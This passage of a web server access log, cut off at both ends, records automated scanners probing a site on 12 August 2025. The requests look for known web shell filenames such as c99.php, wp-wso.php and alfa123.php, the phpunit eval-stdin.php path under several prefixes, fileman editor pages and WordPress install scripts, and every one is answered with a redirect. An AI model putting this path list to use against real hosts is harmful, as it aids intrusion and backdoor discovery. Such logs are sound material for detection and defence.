HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 86.8.204.43 - - [12/Aug/2025:12:29:17 -0400] "GET /send.php HTTP/1.1" 301 239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 18_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.1.1 Mobile/15E148 Safari/604.1" 128.199.106.124 - - [12/Aug/2025:12:29:20 -0400] "GET /xx.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:21 -0400] "GET /XxX.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:23 -0400] "GET /xxx.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:26 -0400] "GET /y.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:31 -0400] "GET /z.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:33 -0400] "GET /zk.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:35 -0400] "GET /zone.php?phpshell HTTP/1.1" 301 248 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:39 -0400] "GET /zx.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 209.38.125.40 - - [12/Aug/2025:12:29:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 144.126.240.247 - - [12/Aug/2025:12:29:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.203.144 - - [12/Aug/2025:12:29:40 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 146.190.190.67 - - [12/Aug/2025:12:29:41 -0400] "GET /Config/net/login.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0" 128.199.106.124 - - [12/Aug/2025:12:29:41 -0400] "GET /symlink.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:42 -0400] "GET /c99.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:45 -0400] "GET /ok.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:47 -0400] "GET /2.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:50 -0400] "GET /3.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:53 -0400] "GET /4.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:29:53 -0400] "GET /wp-content/plugins/seoplugins/mar.php HTTP/1.1" 301 272 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:55 -0400] "GET /6.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:29:57 -0400] "GET /7.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:03 -0400] "GET /8.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:07 -0400] "GET /9.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 85.208.98.53 - - [12/Aug/2025:12:30:10 -0400] "GET /robots.txt HTTP/1.1" 301 241 "-" "Mozilla/5.0 (compatible; SemrushBot-SI/0.97; +http://www.semrush.com/bot.html)" 128.199.106.124 - - [12/Aug/2025:12:30:11 -0400] "GET /10.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:12 -0400] "GET /p.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:16 -0400] "GET /q.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:30:16 -0400] "GET /wp-content/shell20211028.php HTTP/1.1" 301 263 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:19 -0400] "GET /d.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:35 -0400] "GET /f.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:42 -0400] "GET /g.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:49 -0400] "GET /h.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:50 -0400] "GET /j.php HTTP/1.1" 301 236 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:53 -0400] "GET /wp-wso.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:55 -0400] "GET /minimo.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:30:56 -0400] "GET /V3.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:30:59 -0400] "GET /repeater.php HTTP/1.1" 301 247 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:31:01 -0400] "GET /wp-includes/widgets//include.php HTTP/1.1" 301 266 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:01 -0400] "GET /V5.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:03 -0400] "GET /www.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:05 -0400] "GET /100.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:07 -0400] "GET /777.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:08 -0400] "GET /xox.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:09 -0400] "GET /new.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:10 -0400] "GET /wi.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:14 -0400] "GET /nee.php HTTP/1.1" 301 238 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:18 -0400] "GET /87.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:20 -0400] "GET /haxor.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:20 -0400] "GET /FoxWSOv1.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:22 -0400] "GET /bb.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:25 -0400] "GET /lf.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:28 -0400] "GET /hello.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:29 -0400] "GET /if.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:35 -0400] "GET /kn.php HTTP/1.1" 301 237 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:37 -0400] "GET /3301.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:38 -0400] "GET /anone.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:41 -0400] "GET /wp-configer.php HTTP/1.1" 301 246 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:45 -0400] "GET /wp-ad.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:51 -0400] "GET /send.php HTTP/1.1" 301 239 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:56 -0400] "GET /.wp-cache.php HTTP/1.1" 301 244 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:58 -0400] "GET /sendmail.php HTTP/1.1" 301 243 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:31:59 -0400] "GET /rahma.php HTTP/1.1" 301 240 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:04 -0400] "GET /nasgor.php HTTP/1.1" 301 241 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:06 -0400] "GET /alfa123.php HTTP/1.1" 301 242 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:09 -0400] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 281 "-" "python-requests/2.32.4" 128.199.106.124 - - [12/Aug/2025:12:32:12 -0400] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 289 "-" "python-requests/2.32.4" 128.199.106.124 - - [12/Aug/2025:12:32:15 -0400] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 285 "-" "python-requests/2.32.4" 128.199.106.124 - - [12/Aug/2025:12:32:16 -0400] "GET /sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 311 "-" "python-requests/2.32.4" 128.199.106.124 - - [12/Aug/2025:12:32:20 -0400] "GET /modules/autoupgrade/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 301 301 "-" "python-requests/2.32.4" 128.199.106.124 - - [12/Aug/2025:12:32:22 -0400] "GET /assets/editor/fileman/dev.html HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:26 -0400] "GET /assets/editor/fileman/index.html HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:28 -0400] "GET /js/fileman/dev.html HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:38 -0400] "GET /js/fileman/index.html HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:41 -0400] "GET /fileman/index.html HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:47 -0400] "GET /fileman/dev.html HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:50 -0400] "GET /lib/fileman/index.html HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:51 -0400] "GET /lib/fileman/dev.html HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:52 -0400] "GET /admin/fileman/index.html HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:55 -0400] "GET /admin/fileman/dev.html HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:32:57 -0400] "GET /assets/editor/fileman/dev.html HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:03 -0400] "GET /assets/editor/fileman/index.html HTTP/1.1" 301 263 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:06 -0400] "GET /js/fileman/dev.html HTTP/1.1" 301 250 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:06 -0400] "GET /js/fileman/index.html HTTP/1.1" 301 252 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:08 -0400] "GET /fileman/index.html HTTP/1.1" 301 249 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:11 -0400] "GET /fileman/dev.html HTTP/1.1" 301 247 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:13 -0400] "GET /lib/fileman/index.html HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:21 -0400] "GET /lib/fileman/dev.html HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:29 -0400] "GET /admin/fileman/index.html HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:30 -0400] "GET /admin/fileman/dev.html HTTP/1.1" 301 253 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:33 -0400] "GET /wp-admin/install.php HTTP/1.1" 301 251 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:34 -0400] "GET /wp/wp-admin/install.php HTTP/1.1" 301 254 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:34 -0400] "GET /wordpress/wp-admin/install.php HTTP/1.1" 301 261 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:37 -0400] "GET /blog/wp-admin/install.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:40 -0400] "GET /new/wp-admin/install.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:42 -0400] "GET /test/wp-admin/install.php HTTP/1.1" 301 256 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 161.97.135.253 - - [12/Aug/2025:12:33:42 -0400] "GET / HTTP/1.1" 301 231 "-" "Python/3.12 aiohttp/3.11.12" 128.199.106.124 - - [12/Aug/2025:12:33:43 -0400] "GET /old/wp-admin/install.php HTTP/1.1" 301 255 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 128.199.106.124 - - [12/Aug/2025:12:33:44 -0400] "GET /backup/wp-admin/install.php HTTP/1.1" 301 258 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36" 94.16.113.252 - - [12/Aug/2025:12:34:38 -0400] "GET /wp-content/themes/seotheme/mar.php HTTP/1.1" 301 269 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like 